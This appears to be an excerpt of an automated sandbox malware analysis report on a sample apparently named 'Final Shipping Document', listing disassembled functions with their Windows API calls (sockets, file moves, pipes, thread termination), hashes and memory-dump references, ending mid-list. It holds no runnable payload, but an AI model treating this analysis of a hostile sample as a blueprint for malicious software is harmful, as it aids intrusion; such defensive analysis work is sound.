                                                            • Opcode Fuzzy Hash: ba50ba4cce7e56378d4e7369d493abf8354407a802800d86170cf6e25ad10f55
                                                            • Instruction Fuzzy Hash: F4418334A00209ABCF10DF68C885F9EBBF5FF55324F1481A9E915AB392D7319A15CBD1
                                                            Function 00C210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                              • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C21112
                                                            • WSAGetLastError.WSOCK32 ref: 00C21121
                                                            • WSAGetLastError.WSOCK32 ref: 00C211C9
                                                            • closesocket.WSOCK32(00000000), ref: 00C211F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 2675159561-0
                                                            • Opcode ID: ed92e9bf72093cbead237c94341f07b6bf6fdbfceb75016cdd299710d13c89a9
                                                            • Instruction ID: 2f9dd9b1200aba4491b78a510259f9bb4d02dfdaaf36b1b35eed8ce29055ba87
                                                            • Opcode Fuzzy Hash: ed92e9bf72093cbead237c94341f07b6bf6fdbfceb75016cdd299710d13c89a9
                                                            • Instruction Fuzzy Hash: CB41F631600214AFDB109F24D885BAEBBE9FF55324F188059FD15AB292C774EE45CBE1
                                                            Function 00C0CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C0CF22,?), ref: 00C0DDFD
                                                              • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C0CF22,?), ref: 00C0DE16
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C0CF45
                                                            • MoveFileW.KERNEL32(?,?), ref: 00C0CF7F
                                                            • _wcslen.LIBCMT ref: 00C0D005
                                                            • _wcslen.LIBCMT ref: 00C0D01B
                                                            • SHFileOperationW.SHELL32(?), ref: 00C0D061
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 3164238972-1173974218
                                                            • Opcode ID: e05bb3f2616ff01274c57aaf5677aa856b0fa213b3ca03e5f3f597855020827e
                                                            • Instruction ID: c0dc893c3ae368f78847436c9c738578bf6e83e16137ccb8cc12c7ad33939441
                                                            • Opcode Fuzzy Hash: e05bb3f2616ff01274c57aaf5677aa856b0fa213b3ca03e5f3f597855020827e
                                                            • Instruction Fuzzy Hash: 0C4135B19452195EDF12EBA4D9C1FDEB7F9AF48380F1000E6E505EB182EB34A784DB51
                                                            Function 00C32DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C32E1C
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32E4F
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32E84
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C32EB6
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C32EE0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C32EF1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C32F0B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: 58bfe0d3a09b618d9d9bb5819e9afdbd273f92ba1401fee07b8adb2549bd548d
                                                            • Instruction ID: 3008aa586455a5e060c4d8c1ffc6e6fa1c3fa9f33e165d452efcf345e3627e39
                                                            • Opcode Fuzzy Hash: 58bfe0d3a09b618d9d9bb5819e9afdbd273f92ba1401fee07b8adb2549bd548d
                                                            • Instruction Fuzzy Hash: 9F311331614250AFDF20CF58DC86F6937E0EB8AB21F180164FA149B2B1CB71AD80DB40
                                                            Function 00C07726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07769
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C0778F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C07792
                                                            • SysAllocString.OLEAUT32(?), ref: 00C077B0
                                                            • SysFreeString.OLEAUT32(?), ref: 00C077B9
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C077DE
                                                            • SysAllocString.OLEAUT32(?), ref: 00C077EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 89c304296b5f2b97a85c52010ed0659b4f6df455edcf94ceaa98c022cf6dcdca
                                                            • Instruction ID: 8199827e888421cfbbdcfd2fc5d3970d44f1149c83da1c65fbf11d1c9f4fc373
                                                            • Opcode Fuzzy Hash: 89c304296b5f2b97a85c52010ed0659b4f6df455edcf94ceaa98c022cf6dcdca
                                                            • Instruction Fuzzy Hash: 7421AE76A04219AFDB15DFACCC88EBF73ACEB093A4B008125BA14DB190D670ED41C760
                                                            Function 00C077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07842
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C07868
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C0786B
                                                            • SysAllocString.OLEAUT32 ref: 00C0788C
                                                            • SysFreeString.OLEAUT32 ref: 00C07895
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C078AF
                                                            • SysAllocString.OLEAUT32(?), ref: 00C078BD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 237f8821b23df62d30566accd022003f4bb721a55f478928f5d0b78cc69839b9
                                                            • Instruction ID: aa6755d6097050df353d4b6701c2d92bf05519e9c5302b28a692278ddb49ea9c
                                                            • Opcode Fuzzy Hash: 237f8821b23df62d30566accd022003f4bb721a55f478928f5d0b78cc69839b9
                                                            • Instruction Fuzzy Hash: A1216531A04104AFDB149FA8DC88EBE77ECEB097607108225F915EB1E1D674ED41CB64
                                                            Function 00C104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00C104F2
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C1052E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • Opcode ID: 00e737a86ef3255bfa1b63a1f16acaf8cc602b40cff4eb1941ea3f5293785b09
                                                            • Instruction ID: 80a5222020c3133c1601a7292bfcd3f0dcbdb77f9abc480eb8e0bcba8ff9a4d1
                                                            • Opcode Fuzzy Hash: 00e737a86ef3255bfa1b63a1f16acaf8cc602b40cff4eb1941ea3f5293785b09
                                                            • Instruction Fuzzy Hash: 4D218D71500305ABDB209F69DC44BDE7BA5AF46724F304A19F8B1E62E0D7B09AD0EF24
                                                            Function 00C105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C10601
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateHandlePipe
                                                            • String ID: nul
                                                            • API String ID: 1424370930-2873401336
                                                            • Opcode ID: e86bf891cc2fbb7b903a70398f282b77fa131878860eb4785c3b231910bc6ed6
                                                            • Instruction ID: d7539e10c1fd4fdf51b144be98a7c6b429aba0e8b2936a8e3195187c000a1c45
                                                            • Opcode Fuzzy Hash: e86bf891cc2fbb7b903a70398f282b77fa131878860eb4785c3b231910bc6ed6
                                                            • Instruction Fuzzy Hash: 7E216D755002059BDB209F698844ADAB7A4AF96721F300A19FCB1E72E0D7F099E1EB20
                                                            Function 00C340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BA604C
                                                              • Part of subcall function 00BA600E: GetStockObject.GDI32(00000011), ref: 00BA6060
                                                              • Part of subcall function 00BA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C34112
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C3411F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C3412A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C34139
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C34145
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 21143cdfa200dde0b6ac16cd40e83e45187e1c37a54340424064f473734ee2cf
                                                            • Instruction ID: 5ae09410ef85ca364b13b2fcf030644da3ab5280a34847754e05563a19f9407a
                                                            • Opcode Fuzzy Hash: 21143cdfa200dde0b6ac16cd40e83e45187e1c37a54340424064f473734ee2cf
                                                            • Instruction Fuzzy Hash: F31186B21502197EEF219F64CC86EEB7F6DEF09798F014111FA18A6150C6729C61DBA4
                                                            Function 00BDD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BDD7A3: _free.LIBCMT ref: 00BDD7CC
                                                            • _free.LIBCMT ref: 00BDD82D
                                                              • Part of subcall function 00BD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000), ref: 00BD29DE
                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BDD838
                                                            • _free.LIBCMT ref: 00BDD843
                                                            • _free.LIBCMT ref: 00BDD897
                                                            • _free.LIBCMT ref: 00BDD8A2
                                                            • _free.LIBCMT ref: 00BDD8AD
                                                            • _free.LIBCMT ref: 00BDD8B8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                            • Instruction ID: 7926a27bced7d7195f17d718900636a4fcc0fe919417e64c5f9b7be8ba976f39
                                                            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                            • Instruction Fuzzy Hash: 30115E71540B44AAD621BFB0CC47FCBFBDCAF10700F4008A6B2DDA6392EA69B9059664
                                                            Function 00C0DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C0DA74
                                                            • LoadStringW.USER32(00000000), ref: 00C0DA7B
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C0DA91
                                                            • LoadStringW.USER32(00000000), ref: 00C0DA98
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C0DADC
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00C0DAB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 4072794657-3128320259
                                                            • Opcode ID: 9824ee5a4b8d64f63f5d35f4141c42be7d8af0079147c7124b7960f44fda7137
                                                            • Instruction ID: 5f401959d2b8c87e6442253851494ce23eb4e99d25b784e7c98cc4332fdf4d06
                                                            • Opcode Fuzzy Hash: 9824ee5a4b8d64f63f5d35f4141c42be7d8af0079147c7124b7960f44fda7137
                                                            • Instruction Fuzzy Hash: AA0162F25102087FEB109BA09DC9FEF326CE708701F400495B706F2081EA749E848F74
                                                            Function 00C1096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(015DF8F8,015DF8F8), ref: 00C1097B
                                                            • EnterCriticalSection.KERNEL32(015DF8D8,00000000), ref: 00C1098D
                                                            • TerminateThread.KERNEL32(006F0074,000001F6), ref: 00C1099B
                                                            • WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 00C109A9
                                                            • CloseHandle.KERNEL32(006F0074), ref: 00C109B8
                                                            • InterlockedExchange.KERNEL32(015DF8F8,000001F6), ref: 00C109C8
                                                            • LeaveCriticalSection.KERNEL32(015DF8D8), ref: 00C109CF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: f1337b27275384198cef7c1f2ebc19f77de35ab3648c5044725832cf83906070
                                                            • Instruction ID: 8afe808afceb5fc8e97a58358b9cf6618e67e52ea690b9427150090edf106fad
                                                            • Opcode Fuzzy Hash: f1337b27275384198cef7c1f2ebc19f77de35ab3648c5044725832cf83906070
                                                            • Instruction Fuzzy Hash: 78F0C932452A12ABD7515BA4EEC9BDEBA29BF05702F502025F202A08A1C7B595B5DF90
                                                            Function 00C21C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C21DC0
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C21DE1
                                                            • WSAGetLastError.WSOCK32 ref: 00C21DF2
                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00C21EDB
                                                            • inet_ntoa.WSOCK32(?), ref: 00C21E8C
                                                              • Part of subcall function 00C039E8: _strlen.LIBCMT ref: 00C039F2
                                                              • Part of subcall function 00C23224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C1EC0C), ref: 00C23240
                                                            • _strlen.LIBCMT ref: 00C21F35
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3203458085-0
                                                            • Opcode ID: 0fd01b54b36c83ec9bb55e5196ff8eb0adee00e8bd69ab36a6e2aeeb3dd59b1e
                                                            • Instruction ID: 89d76e8cc108dae3dc609191fb020453465c850eeb64555ae8f29a55fac8fa54
                                                            • Opcode Fuzzy Hash: 0fd01b54b36c83ec9bb55e5196ff8eb0adee00e8bd69ab36a6e2aeeb3dd59b1e
                                                            • Instruction Fuzzy Hash: A3B12230204350AFC320DF24D891F2A7BE5AF95318F58859CF8665B6E2CB71EE42CB91
                                                            Function 00BD01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __allrem.LIBCMT ref: 00BD00BA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD00D6
                                                            • __allrem.LIBCMT ref: 00BD00ED
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD010B
                                                            • __allrem.LIBCMT ref: 00BD0122
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD0140
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 1992179935-0
                                                            • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                            • Instruction ID: 7445de534b29746397984d78874ca47e2df0853635a1563f4b2202651caffbb0
                                                            • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                            • Instruction Fuzzy Hash: 2381D072A01706ABE720AB29CC81B6AB3E9EF41364F2445BFF551D6381F770D9008B94
                                                            Function 00BD61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BC82D9,00BC82D9,?,?,?,00BD644F,00000001,00000001,8BE85006), ref: 00BD6258
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BD644F,00000001,00000001,8BE85006,?,?,?), ref: 00BD62DE
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD63D8
                                                            • __freea.LIBCMT ref: 00BD63E5
                                                              • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            • __freea.LIBCMT ref: 00BD63EE
                                                            • __freea.LIBCMT ref: 00BD6413
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
